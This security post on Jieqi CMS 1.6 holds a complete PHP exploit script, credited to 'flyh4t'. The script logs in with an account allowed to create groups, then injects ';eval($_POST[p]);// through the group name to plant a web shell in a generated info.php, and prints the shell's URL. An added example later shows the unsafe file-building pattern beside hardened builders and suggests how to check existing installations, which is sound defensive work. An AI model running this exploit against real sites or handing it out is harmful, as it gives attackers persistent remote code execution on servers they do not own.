Jieqi Website Management System (JIEQI CMS for short; China National Copyright Administration software registration number 2006SR03382) is a modular website-building system that advertises itself as simple and flexible, high-performance, secure and reliable. The vendor offers the currently most popular Jieqi serialized-novel system, the Jieqi original comics system and digital publishing solutions, as well as various custom website services.
The system has several remote security vulnerabilities. The one reported today is a remote code execution vulnerability in version 1.6, which should be more than two years old by now.
It requires a user account that is allowed to create a group (圈子).
```php
<?php

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host: target server (ip/hostname)
path: path to jieqicms
username: a username who can create group
password: password of that user
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);
$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

/* get cookie: log in and store the session cookie in a jar file */
$cookie_jar_index = 'cookie.txt';
$url1 = "http://$host/$path/login.php";
$params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1";
$curl1 = curl_init();
curl_setopt($curl1, CURLOPT_URL, $url1);
curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index);
curl_setopt($curl1, CURLOPT_POST, 1);
curl_setopt($curl1, CURLOPT_POSTFIELDS, $params);
ob_start();
$data1 = curl_exec($curl1);
if ($data1 === FALSE) {
    echo "cURL Error: " . curl_error($curl1);
    exit('exploit failed');
}
curl_close($curl1);
ob_clean();

/* get shell: the group name (gname) is written unescaped into the generated info.php */
$params  = '-----------------------------23281168279961
Content-Disposition: form-data; name="gname"

';
$params .= "';";
$params .= 'eval($_POST[p]);//flyh4t
-----------------------------23281168279961
Content-Disposition: form-data; name="gcatid"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gaudit"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gbrief"

1
-----------------------------23281168279961--
';
$url2 = "http://$host/$path/modules/group/create.php";
$curl2 = curl_init();
$header = array(
    'Content-Type: multipart/form-data; boundary=---------------------------23281168279961'
);
curl_setopt($curl2, CURLOPT_URL, $url2);
curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index);
curl_setopt($curl2, CURLOPT_POST, 1);
curl_setopt($curl2, CURLOPT_POSTFIELDS, $params);
ob_start();
curl_exec($curl2);
curl_close($curl2);
$resp = ob_get_contents(); // $resp holds the returned page
ob_clean();

preg_match('/g=([0-9]{1,4})/', $resp, $shell); // group id of the newly created group
//print_r($shell);
//print_r($resp);
$url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php";
echo "view your shell here (password: p)\r\n";
echo $url;
```
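The injection works because the group name submitted to create.php is written into a generated PHP include as source text, so a name that closes the string literal leaves executable code behind. As an added example that is not Jieqi CMS code (the CMS's own file generator is not shown here, so the unsafe builder is an assumed reconstruction of that pattern), here is that pattern beside two hardened ways of persisting the same record:

```php
<?php
// Added example, not Jieqi CMS code. build_info_unsafe() is an assumed
// reconstruction of how a generated info.php receives the group name; the
// other builders persist the same data without turning input into code.

// UNSAFE (assumed pattern): the group name is pasted into PHP source inside
// single quotes. A name such as  ';eval($_POST[p]);//  closes the literal,
// so the remainder is compiled and executed whenever info.php is loaded.
function build_info_unsafe(string $gname, int $gcatid): string
{
    return "<?php\n\$groupname = '$gname';\n\$gcatid = $gcatid;\n";
}

// SAFE: var_export() emits a correctly escaped PHP literal for any input,
// so the name can never leave string context. Load with: $g = include $file;
function build_info_safe(string $gname, int $gcatid): string
{
    $record = ['groupname' => $gname, 'gcatid' => $gcatid];
    return "<?php\nreturn " . var_export($record, true) . ";\n";
}

// SAFER: keep user data out of PHP files altogether. A .json file under a
// directory the web server is configured not to execute cannot become a
// web shell even if some escaping elsewhere turns out to be wrong.
function build_info_json(string $gname, int $gcatid): string
{
    return json_encode(['groupname' => $gname, 'gcatid' => $gcatid],
                       JSON_UNESCAPED_UNICODE | JSON_THROW_ON_ERROR);
}

// Round-trip check: the generated include must hand back exactly the name
// that was stored and nothing else may run. A temp file is used so include()
// compiles the output the same way production would.
function safe_round_trip(string $gname): bool
{
    $file = tempnam(sys_get_temp_dir(), 'grp');
    file_put_contents($file, build_info_safe($gname, 1));
    $loaded = include $file;
    unlink($file);
    return $loaded['groupname'] === $gname;
}

// Constructed input: the same group name the post above submits as gname.
$payload = "';eval(\$_POST[p]);//";
echo build_info_unsafe($payload, 1), "\n";   // literal is closed, eval() becomes live code
echo build_info_safe($payload, 1), "\n";     // payload stays one escaped string value
var_dump(safe_round_trip($payload));         // whether the name survived unchanged
```

Independently of the fix, existing installations can be checked by comparing each files/group/userdir/*/*/info.php against what the builder should have produced for that group, since a legitimate file never contains anything beyond the stored record.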